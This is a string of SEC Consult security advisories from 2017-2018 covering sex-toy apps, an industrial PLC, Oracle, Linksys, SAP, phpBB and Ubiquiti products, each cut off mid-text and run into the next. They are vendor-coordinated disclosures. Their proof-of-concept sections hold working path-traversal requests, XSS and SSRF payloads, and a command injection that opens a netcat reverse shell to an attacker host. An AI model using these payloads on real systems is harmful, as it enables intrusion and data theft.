We have published an accompanying blog post to this technical advisory with further information: https://www.sec-consult.com/en/blog/2018/02/internet-of-dildos-a-long-way-to-a-vibrant-future-from-iot-to-iod/index.html SEC Consult Vulnerability Lab Security Advisory < 20180201-0 > === title: Multiple critical vulnerabilities product: Whole Vibratissimo Smart Sex Toy product range vulnerable version: <6.3 (iOS), <6.2.2 (Android), <2.0.2 (Firmware) fixed version: 6.3 (iOS), 6.2.2 (Android), 2.0.2 (Firmware) CVE number: - impact: critical homepage: http://www.vibratissimo.com found: 2017-10-01 by: W. Schober (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Control with Vibratissimo your AMOR Toy on your smartphone and get even more features by the app. With Vibratissimo you are open to new and exciting opportunities, whether you are in the same room or on different continents." Source: http://www.vibratissimo.com/en/index.html Business recommendation: SEC Consult highly recommends to update the app to the newest version available in the appstore. Furthermore the password, which was used within the app, should be changed immediately. If the password was used for multiple services, all passwords should be changed. To get rid of issue number 3 (Unauthenticated Bluetooth LE Connections) a firmware update can be applied. To apply the firmware update the devices have to be sent to Amor Gummiwaren GmbH. Vulnerability overview/description: --- 1) Customer Database Credential Disclosure The credentials for the whole Vibratissimo database environment were exposed on the internet. Due to the fact, that the PHPMyAdmin interface was exposed as well, an attacker could have been able to connect to the database and dump the whole data set. The dataset contains for example the following data: - Usernames - Session Tokens - Cleartext passwords - chat histories - explicit image galleries, which are created by the users themselves 2) Exposed administrative interfaces on the internet An administrative interface for databases was available without any filtering to the whole internet. In combination with other vulnerabilities an attacker could have been able to get access to the whole database data and even take over the server. 3) Cleartext Storage of Passwords The user passwords were stored unhashed in cleartext in the database. If an attacker gained access to the database (e.g. via credential disclosure), he could have been able to retrieve the plaintext passwords of users and abuse their privileges in the system. 4) Unauthenticated Bluetooth LE Connections The sex toys are connected without prior authentication to the app, which is the standard use case. For example one of the identified Bluetooth services allows to read the current device temperature. Other services, which can be accessed without prior authentication are: -) Setting the "intensity" of the current vibration pattern -) Reading various values (Temperature, etc) 5) Insufficient Authentication Mechanism The android application is using a type of authentication, which is against known best practice. The username and password are sent with every request to the server to authenticate and authorise the request. There is no session management implemented. However, the authentication credentials are transmitted via an encrypted SSL/TLS connection. 6) Insecure Direct Object Reference Due to flaws in the authorization schema, an authorization bypass vulnerability allows an attacker to get access to restricted functions and resources. In this case a user is able to set a profile picture by uploading a provided image. The image is stored on the Vibratissimo server and renamed. All images are renamed by incrementing a global number and assigning this number as the name of the image (e.g 200.png). An attacker is now able to iterate through those images and dump personal user images containing partially explicit content. The image can even be accessed if the profile has been set to "hidden" by the user. 7) Missing Authentication in Remote Control The mobile apps allow their users to use a feature called quick control. This feature allows to send a link with a unique ID to an email address or a telephone via SMS to get direct control of the sex toy over the internet. This wouldn't be a problem in gener
SEC Consult SA-20180131-0 :: Multiple Vulnerabilities in Sprecher Automation SPRECON-E-C, PU-2433
SEC Consult Vulnerability Lab Security Advisory < 20180131-0 > === title: Multiple Vulnerabilities product: Sprecher Automation SPRECON-E-C, PU-2433 vulnerable version: <8.49 (most vulnerabilities, see "Vulnerable version" for details) fixed version: 8.49 (most vulnerabilities, see "Solution" for details) CVE number: - impact: Medium homepage: https://www.sprecher-automation.com found: 2017-08-15 by: T. Weber, C.A. (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Sprecher Automation GmbH offers switchgears and automation solutions for energy, industry and infrastructure processes. Our customers are power utilities, industries, transportation companies, municipal utilities and public institutions. Company-own developments and cooperations with technology partners lead to a unique product portfolio consisting of traditional electrical technologies as well as high-tech electronics." Source: https://www.sprecher-automation.com/en/ Business recommendation: SEC Consult recommends to immediately patch the systems and follow the hardening guide provided by the vendor (SEC Consult did not have access to the hardening guide in order to review it). A thorough security review should be performed by security professionals as further security issues might exist within the product. Vulnerability overview/description: --- 1) Authenticated Path Traversal Vulnerability The web interface of the Sprecher PLC suffers from a path traversal vulnerability. A user which is authenticated on the web interface, which is intended as read-only interface, can download files with the permissions of the webserver (www-data). Files like "/etc/shadow" are not readable for the webserver. 2) Client-Side Password Hashing The password hashes which are stored on the system can be directly used to authenticate on the web interface (pass-the-hash) since the password is hashed in the browser of the user during login. 3) Missing Authentication The PLC exposes a Telnet management service on TCP port 2048. This interface can be used to control the PLC and does not require any authentication. 4) Permanent Denial of Service via Portscan An aggressive TCP SYN scan on a large amount of ports triggers a denial of service of the PLC service. This results in an persistent DoS of the standby PLC in an active - standby pair. Manual operator intervention is required to restore service availability. 5) Outdated Linux Kernel An ancient Linux kernel version with a high number of known security weaknesses is used for the PLC base operating system. Proof of concept: - 1) Authenticated Path Traversal Vulnerability Reading "passwd" is possible by triggering the following request: --- GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1 Host: Cookie: sid= Connection: close Upgrade-Insecure-Requests: 1 --- The file is directly fetched from the system: --- root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh operator:x:37:37:Operator:/var:/bin/sh haldaemon:x:68:68:hald:/:/bin/sh dbus:x:81:81:dbus:/var/run/dbus:/bin/sh nobody:x:99:99:nobody:/home:/bin/sh sshd:x:103:99:Operator:/var:/bin/sh [...] --- 2) Client-Side Password Hashing The passwords are hashed in JavaScript before they are transmitted to the device. Therefore the hash is as good as the password. The following request shows a login process: --- POST /webserver/cgi-bin/spre.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json Accept-Language: de Content-Type: application/x-www-form-urlencoded If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT Referer: http:///We
SEC Consult SA-20180123-0 :: XXE & Reflected XSS in Oracle Financial Services Analytical Applications
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 > === title: XXE & Reflected XSS product: Oracle Financial Services Analytical Applications vulnerable version: 7.3.5.x, 8.0.x fixed version: Oracle CPU January 2018 CVE number: CVE-2018-2660, CVE-2018-2661 impact: High homepage: http://www.oracle.com/us/products/applications/ financial-services/analytical-applications/index.html found: 2017-06-15 by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Oracle is the unchallenged leader in Financial Services, with an integrated, best-in-class, end-to-end solution of intelligent software and powerful hardware designed to meet every financial service need." Source: http://www.oracle.com/us/products/applications/ financial-services/analytical-applications/index.html Business recommendation: By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user's system using the OFSAA web application and thus obtain sensitive information from the system. It is also possible to bypass input validation checks in order to inject JavaScript code. SEC Consult recommends to immediately install the patched version. Furthermore, a thorough security review should be performed by security professionals to identify potential further security issues. Vulnerability overview/description: --- 1) XML eXternal Entity (XXE) Injection (CVE-2018-2660) The web application allows users to import XML files. An attacker can import a specially crafted XML file and exploit the XXE vulnerability within the application. 2) Reflected Cross Site Scripting (CVE-2018-2661) This vulnerability allows an unauthenticated user to inject malicious client side script which will be executed in the browser of a user if he visits the manipulated URL. Proof of concept: - 1) XML External Entity Injection (XXE) (CVE-2018-2660) For example, by importing the following XML code in the "Business Model Upload" function a connection request from the server to the attacker's system will be made. http://[IP:port]/; >]> IP:port = IP address and port where the attacker is listening for connections Furthermore some files can be exfiltrated to remote servers via the techniques described in: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf 2) Reflected Cross Site Scripting (CVE-2018-2661) The following parameters have been found to be vulnerable to reflected cross site scripting attacks. Furthermore, there are many more vulnerable parameters. The following payload shows a simple alert message box: URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle= METHOD : GET PAYLOAD : winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp? url=fetchErrorMessages.action=OCBCOFSAASG=summarypage={62}~ METHOD : GET PAYLOAD : errorMessage={62}~%27;alert%0a(0);//=DeleteConfirm Vulnerable / tested versions: - The following version has been tested which was the most recent one when the vulnerabilities were discovered: * Oracle Financial Services Analytical Applications 8.0.4.0.0 According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU January 2018. Vendor contact timeline: 2017-09-11: Contacting vendor through encrypted email (secalert...@oracle.com) 2017-09-20: Vendor requested to postpone the release date 2018-01-13: Vendor informed that Critical Patch Update that includes fixes of reported issues will be released on 2018-01-16. CVE-2018-2660 & CVE-2018-2661 were assigned for the issues 2018-01-23: Public disclosure of advisory Solution: - Apply patch update in the January 2018 Critical Patch Update: http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin
SEC Consult SA-20171018-1 :: Multiple vulnerabilities in Linksys E-series products
SEC Consult Vulnerability Lab Security Advisory < 20171018-1 > === title: Multiple vulnerabilities product: Linksys E series, see "Vulnerable / tested versions" vulnerable version: see "Vulnerable / tested versions" fixed version: no public fix, see solution/timeline CVE number: - impact: high homepage: http://www.linksys.com/ found: 2017-06-26 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Today, Belkin International has three brands – Belkin, Linksys and WeMo – to enhance the technology that connects us to the people, activities and experiences we love. Belkin products are renowned for their simplicity and ease of use, while our Linksys brand helped make wireless connectivity mainstream around the globe. Our newest brand, WeMo, is the leader in delivering customizable smart home experiences. Its product platform empowers people to monitor, measure and manage their electronics, appliances and lighting at home and on-the-go." Source: http://www.belkin.com/uk/aboutUs/ Business recommendation: SEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Denial of Service (DoS) A denial of service vulnerability is present in the web server of the device. This vulnerability is very simple to trigger since a single GET request to a cgi-script is sufficient. A crafted GET request, e.g. triggered by CSRF over a user in the internal network, can reboot the whole device or freeze the web interface and the DHCP service. This action does not require authentication. 2) HTTP Header Injection & Open Redirect Due to a flaw in the web service a header injection can be triggered without authentication. This kind of vulnerability can be used to perform different arbitrary actions. One example in this case is an open redirection to another web site. In the worst case a session ID of an authenticated user can be stolen this way because the session ID is embedded into the url which is another flaw of the web service. 3) Improper Session-Protection The session ID for administrative users can be fetched from the device from LAN without credentials because of insecure session handling. This vulnerability can only be exploited when an administrator was authenticated to the device before the attack and opened a session previously. The login works if the attacker has the same IP address as the PC of the legitimate administrator. Therefore, a CSRF attack is possible when the administrator is lured to surf on a malicious web site or to click on a malicious link. 4) Cross-Site Request Forgery Vulnerability in Admin Interface A cross-site request forgery vulnerability can be triggered in the administrative interface. This vulnerability can be exploited because the session ID can be hijacked by using 3) via LAN. An exploitation via internet is only possible if the session id is exposed to the internet (for example via the referrer). An attacker can change any configuration of the device by luring a user to click on a malicious link or surf to a malicious web-site. 5) Cross-Site Scripting Vulnerability in Admin Interface A cross-site scripting vulnerability can be triggered in the administrative interface. This vulnerability can be exploited because the session ID can be hijacked by using 3) via LAN. An exploitation via internet is only possible if the session id is exposed to the internet (for example via the referrer). By using this vulnerability, malicious code can be executed in the context of the browser session of the attacked user. Proof of concept: - 1) Denial of Service Unauthenticated request for triggering a router reboot in browser: http:///upgrade.cgi http:///restore.cgi Unauthenticated request for triggering a router freeze in browser: http:///mfgtst.cgi 2) HTTP Header Injection & Open Redirect A header injection can be triggered by the following unauthenticated request: Request: -- POST /UnsecuredEnable.cgi HTTP/1.1 Host: Accept: */* Accept-Language: en Connection: close Referer: http:///Unsecured.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 97
SEC Consult SA-20171016-0 :: Multiple vulnerabilities in Micro Focus VisiBroker C++
SEC Consult Vulnerability Lab Security Advisory < 20171016-0 > === title: Multiple vulnerabilities product: Micro Focus VisiBroker C++ vulnerable version: 8.5 SP2 fixed version: 8.5 SP4 HF3 CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283 impact: High homepage: https://www.microfocus.com/products/corba/visibroker/ found: 2017-04 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying, and managing distributed applications. Built on open industry standards and a high-performance architecture, VisiBroker is especially suited to low-latency, complex, data-oriented, transaction-intensive, mission-critical environments. Using VisiBroker(R), organizations can develop, connect, and deploy complex distributed applications that have to meet very high performance and reliability standards. With more than 30 million licenses in use, VisiBroker is the world’s most widely deployed CORBA Object Request Broker (ORB) infrastructure." URL: https://www.microfocus.com/products/corba/visibroker/ Business recommendation: During a superficial fuzzing test, SEC Consult found several memory corruption vulnerabilities that allow denial of service attacks or potentially arbitrary code execution. Although the fuzzing test only had a very limited coverage, several vulnerabilities have been identified. Assuming the code quality is homogenous, it is possible that other parts of the application exhibit similar issues. SEC Consult did not attempt to fully evaluate the potential impact of the identified vulnerabilities. SEC Consult recommends to decommission any VisiBroker C++ component that communicates with untrusted entities until a full security audit has been performed. Moreover, SEC Consult recommends to restrict network access to all CORBA services that utilize the VisiBroker C++ environment. Vulnerability overview/description: --- 1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281] By specifying a large value for a length field, an integer overflow occurs. As a result, the application reads memory until a non-mapped memory region is reached. This causes the application to encounter a segmentation fault. 2) Integer Overflow (Heap Overwrite) [CVE-2017-9282] By specifying a manipulated value for a length field an attacker can cause an integer overflow. This causes the application to allocate too little memory. When the application attempts to write to this memory buffer, heap memory is overwritten leading to denial of service or potentially arbitrary code execution. 3) Out of Bounds Read [CVE-2017-9283] By specifying a manipulated value for a length field, an attacker can cause the application to read past an allocated memory region. 4) Use after Free SEC Consult found that the application under certain circumstances tries to access a memory region that has been deallocated before. It is unclear whether Micro Focus fixed the root cause of this behaviour. As the vendor was unable to reproduce the vulnerability in the current version, Micro Focus believes that the vulnerability was fixed with a previous update. Since SEC Consult is unsure whether Micro Focus found the root cause of the vulnerability, we refrain from releasing proof of concept code. Proof of concept: - A service implementing the following IDL was used to identify the vulnerabilities listed here: module Bank { interface Account { float balance(in string test); }; interface AccountManager { Account open(in string name); }; }; The implemented service was based on the Visibroker example project "bank_agent". 1) Integer Overflow / Out of Bounds Read (Denial of Service) The method CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put( CORBA_MarshalOutBuffer *this, const char *src, unsigned int size) is used to copy/append a char[] into a buffer. If the size of the data that is stored in the buffer plus the size of the char[] to be appended exceeds the allocated size, the method reallocates the buffer. By choosing the size of the char[] as e.g. 0x (on 32 bit systems) an integer overflow can be caused. The method then continues without allocating additional memory. However, the application then expects that the source buffer contains 0x bytes o
SEC Consult SA-20170912-0 :: Email verification bypass in SAP E-Recruiting
SEC Consult Vulnerability Lab Security Advisory < 20170912-0 > === title: Email verification bypass product: SAP E-Recruiting vulnerable version: 605, 606, 616, 617 fixed version: see SAP security note number 2507798 impact: medium homepage: https://www.sap.com found: 2017-07-12 by: Marc Nimmerrichter (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "SAP E-Recruiting" has recruitment and succession planning instruments that will help your company find new employees, employ them in positions that suit their capabilities, promote their professional development, and retain them in the long term. As well as enabling you to handle your company’s applicant tracking activities, "SAP E-Recruiting" ensures that you drive up-to-date human resources management, by proactively maintaining contact with applicants, potential candidates, and consequently, with your employees. Source: https://help.sap.com/saphelp_erp60_sp/helpdata/en/73/8bcf535b804808e1000a174cb4/frameset.htm Business recommendation: Email address verification during the applicant registration can be bypassed. Businesses using the vulnerable component are advised to estimate the impact of insufficient email address verification on their business processes and react accordingly. It is recommended to install a patched version as soon as possible. Vulnerability overview/description: --- When an external applicant registers to the E-Recruiting application, he/she receives a link by email to confirm access to the provided email address. However, this measure can be bypassed and attackers can register and confirm email addresses that they do not have access to. An attacker could register email addresses not belonging to him/her. This could have a business impact, because business processes might rely on a verified email address. Furthermore, since an email address can be registered only once, an attacker could prevent other legitimate users from registering to the E-Recruiting application. Proof of concept: - The email verification link contains the "param" HTTP GET parameter with base64 encoded data. When decoded, this data contains the parameters "candidate_hrobject" and "corr_act_guid". candidate_hrobject is an incremental user ID. corr_act_guid is a random value that needs to be provided during the email verification. However, this value is not bound to the current registration, which means that the value of a previous registration can be reused. Since candidate_hrobject is incremental, it can be guessed by an attacker. An attacker who wants to register with an email address not belonging to him/her, could simply do the following: 1. Register with his own email address 2. Directly afterwards register with someone else's email address 3. Read the current value of candidate_hrobject in the confirmation link from the first registration 4. Increment this value by 1 5. Send the new value in the HTTP GET request, use the corr_act_guidparameter from the first registration 6. If this did not work: go back to step 4 to try the next ID (maybe other people registered in between the two registrations) This attack works because there is no per-registration nonce in the confirmation link. Vulnerable / tested versions: - The vulnerability was found in the following release of E-Recruiting (ERECRUIT): Release: 617 According to the vendor, the following versions are affected: Release: 605, 606, 616, 617 Vendor contact timeline: 2017-07-12: Contacted vendor via encrypted email with vulnerability description and Responsible Disclosure Policy attached at sec...@sap.com 2017-07-13: Vendor confirmed the receipt of the email 2017-07-25: Vendor confirmed the vulnerability 2017-07-31: Contacted vendor to ask for patch release date and versions affected 2017-08-01: Vendor stated they are working on the fix and requested "adequate time". Link to SAP Responsible Disclosure Policy was provided. 2017-08-01: Discussing release date, requested planned patch release date and versions affected. 2017-08-02: Vendor stated that the patch cannot be published until 2017-08-31 and requested more time before advisory publication. 2017-08-23: Contacted vendor to request current patch status, planne
SEC Consult SA-20170804-0 :: phpBB Server Side Request Forgery (SSRF) vulnerability
SEC Consult Vulnerability Lab Security Advisory < 20170804-0 > === title: Server Side Request Forgery Vulnerability product: phpBB vulnerable version: 3.2.0 fixed version: 3.2.1 CVE number: impact: Medium homepage: https://www.phpbb.com/ found: 2017-05-21 by: Jasveer Singh (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "phpBB is a free flat-forum bulletin board software solution that can be used to stay in touch with a group of people or can power your entire website. With an extensive database of user-created extensions and styles database containing hundreds of style and image packages to customise your board, you can create a very unique forum in minutes." Source: https://www.phpbb.com/ Business recommendation: The patch should be installed immediately. Furthermore, SEC Consult recommends to perform a thorough security review of this software. Vulnerability overview/description: --- The phpBB forum software is vulnerable to the server side request forgery (SSRF) attack. An attacker is able to perform port scanning, requesting internal content and potentially attacking such internal services via the web application's "Remote Avatar" function. Proof of concept: - This vulnerability can be exploited by an attacker with a registered account as low as a normal account. If the web application enables remote avatar, this feature could be abused by an attacker to perform port scanning. Below is the example on how the SSRF issue can be exploited. URL : http://$DOMAIN/ucp.php?i=ucp_profile=avatar METHOD : POST PARAMETER : avatar_remote_url PAYLOAD : http://$DOMAIN:$PORT/x.jpg Vulnerable / tested versions: - phpBB version 3.2.0 has been tested. This version was the latest at the time the security vulnerability was discovered. Vendor contact timeline: 2017-05-23: Contacting vendor through security bug tracker. 2017-05-29: Vendor confirms the vulnerabilities and working on the fixes. 2017-07-12: Vendor requesting extension for deadline of 5 days from the latest possible release date. 2017-07-17: Patch released by the vendor. 2017-08-04: Public release of the advisory. Solution: - Upgrade to phpBB 3.2.1 For further information see: https://www.phpbb.com/community/viewtopic.php?f=14=14782136 Workaround: --- Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Jasveer Singh / @2017 signature.asc Description: OpenPGP digital signature
SEC Consult SA-20170804-1 :: Ubiquiti Networks UniFi Cloud Key authenticated command injection
SEC Consult Vulnerability Lab Security Advisory < 20170804-1 > === title: Authenticated Command Injection product: Ubiquiti Networks UniFi Cloud Key vulnerable version: Firmware v0.6.1 fixed version: Firmware v0.6.4 CVE number: impact: High homepage: https://www.ubnt.com found: 2017-03-26 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets." Source: http://ir.ubnt.com/ Business recommendation: SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- A command injection can be triggered via the hostname header in the status GET request. This vulnerability can be exploited when the Cloud Key web interface is exposed to the Internet and an attacker has credentials to it. Proof of concept: - The following PHP snipplet is responsible for the command execution vulnerability: (api.inc, line 265) --- [...] function is_unifi_running() { if (!isset($_SERVER['HTTP_HOST'])) { $c_host = $_SERVER['SERVER_ADDR']; } else { $c_host = $_SERVER['HTTP_HOST']; } $unifi_href = 'http://' . $c_host . ':8080/status'; exec(CMD_CURL . $unifi_href, $out, $rc); if ($rc == 0) { return true; } return false; } [...] --- Since '$c_host' is not filtered, a command injection is possible. The following GET request was used to open a reverse-shell via command injection from the Cloud Key system (192.168.0.30) to the attacker (192.168.0.3): --- GET /api/status HTTP/1.1 Host: 192.168.0.30;busybox nc 192.168.0.3 8999 -e bash; User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 X-Access-Token: Referer: https://192.168.0.30/login Cookie: CKSESSIONID= Connection: close --- As the listener, netcat was used: $ nc -lvp 8999 Vulnerable / tested versions: - Ubiquiti Networks UniFi Cloud Key version 0.6.1 has been tested. This version was the latest at the time the security vulnerabilities were discovered. Vendor contact timeline: 2017-03-29: Contacting vendor via HackerOne. Vendor sets status to "Triaged". 2017-04-24: Asking for a status update; No answer. 2017-05-06: Found update 0.6.4 on the website of the vendor. 2017-05-15: Contacted vendor via e-mail and asked for status. 2017-05-16: Vendor closed the ticked and changed the status to resolved. Current firmware version was v0.6.4. Set the publication date to 2017-08-04 (at least 90 days after fix). 2017-08-04: Public release of security advisory Solution: - Upgrade to v0.6.4 or above. Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.
SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-0 > === title: Cross-Site Scripting (XSS) product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP vulnerable version: Firmware v1.9.1 fixed version: Firmware v1.9.1.1 CVE number: impact: Medium homepage: https://www.ubnt.com found: 2017-04-04 by: R. Freingruber, T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets." Source: http://ir.ubnt.com/ Business recommendation: SEC Consult recommends not to use this device in production until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Reflected Cross Site Scripting (XSS) in Internet Explorer This vulnerability can be exploited by deactivating or bypassing the integrated XSS-filter of the Internet Explorer. A reflected cross site scripting vulnerability was identified because of an initialization error in "/files/index/". An attacker can exploit this vulnerability by tricking a victim to visit a malicious website. The attacker is able to hijack the session of the attacked user. If the user is currently not logged in, the injected JavaScript code can start a bruteforce attack (for example, with the default credentials ubnt:ubnt). After a session has been established, the code has full control over the system via the CLI feature which is basically a shell wrapper. By abusing this vulnerability an attacker can open ports on the router or start a reverse shell. Proof of concept: - 1) Reflected Cross Site Scripting (XSS) in Internet Explorer The following URL can be used as PoC: https://192.168.1.1/files/index/0/aaa
SEC Consult SA-20170724-1 :: Open Redirect issue in multiple Ubiquiti Networks products
SEC Consult Vulnerability Lab Security Advisory < 20170724-1 > === title: Open Redirect in Login Page product: Multiple Ubiquiti Networks products, e.g. TS-16-CARRIER, TS-5-POE, TS-8-PRO, AG-HP-2G16, AG-HP-2G20, AG-HP-5G23, AG-HP-5G27, AirGrid M, AirGrid M2, AirGrid M5, AR, AR-HP, BM2HP, BM2-Ti, BM5HP, BM5-Ti, LiteStation M5, locoM2, locoM5, locoM9, M2, M3, M365, M5, M900, NB-2G18, NB-5G22, NB-5G25, NBM3, NBM365, NBM9, NSM2, NSM3, NSM365, NSM5, PBM10, PBM3, PBM365, PBM5, PICOM2HP, Power AP N vulnerable version: AirOS 6.0.1 (XM), 1.3.4 (SW) fixed version: AirOS 6.0.3 (XM), 1.3.5 (SW) CVE number: impact: Low homepage: https://www.ubnt.com/ found: 2017-03-22 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Ubiquiti Networks develops high-performance networking technology for service providers and enterprises. Our technology platforms focus on delivering highly advanced and easily deployable solutions that appeal to a global customer base in underserved and underpenetrated markets." Source: http://ir.ubnt.com/ Business recommendation: SEC Consult recommends not to use the devices in production until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- 1) Open Redirect in Login Page - HackerOne #158287 A open redirect vulnerability can be triggered by luring an attacked user to authenticate to a Ubiquiti AirOS device by clicking on a crafted link. This vulnerability was found earlier by another bug bounty participant on HackerOne. It was numbered with #158287. Proof of concept: - http:///login.cgi?uri=https://www.sec-consult.com After a successful login, the user will be redirected to https://www.sec-consult.com. Vulnerable / tested versions: - Ubiquiti Networks AirRouter (v6.0.1) Ubiquiti Networks TS-8-PRO (v1.3.4) Based on information embedded in the firmware of other Ubiquiti products gathered from our IoT Inspector tool we believe the following devices are affected as well: Ubiquiti Networks LBE-M5-23 (Version: XW v6.0.1) Ubiquiti Networks NBE-M2-13 (Version: XW v6.0.1) Ubiquiti Networks NBE-M5-16 (Version: XW v6.0.1) Ubiquiti Networks NBE-M5-19 (Version: XW v6.0.1) Ubiquiti Networks PBE-M2-400 (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-300 (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-300-ISO (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-400 (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-400-ISO (Version: XW v6.0.1) Ubiquiti Networks PBE-M5-620 (Version: XW v6.0.1) Ubiquiti Networks RM2-Ti (Version: XW v6.0.1) Ubiquiti Networks RM5-Ti (Version: XW v6.0.1) Vendor contact timeline: 2017-03-22: Contacting vendor via HackerOne. 2017-03-22: Vendor marked open redirect as duplicate to: #158287 The contact also states that this issue will be resolved in the next release. 2017-05-05: Found updates (6.0.3 and 1.3.5) on the website of the vendor and confirmed the fix - provide at least 90 days for customers to apply the patch. 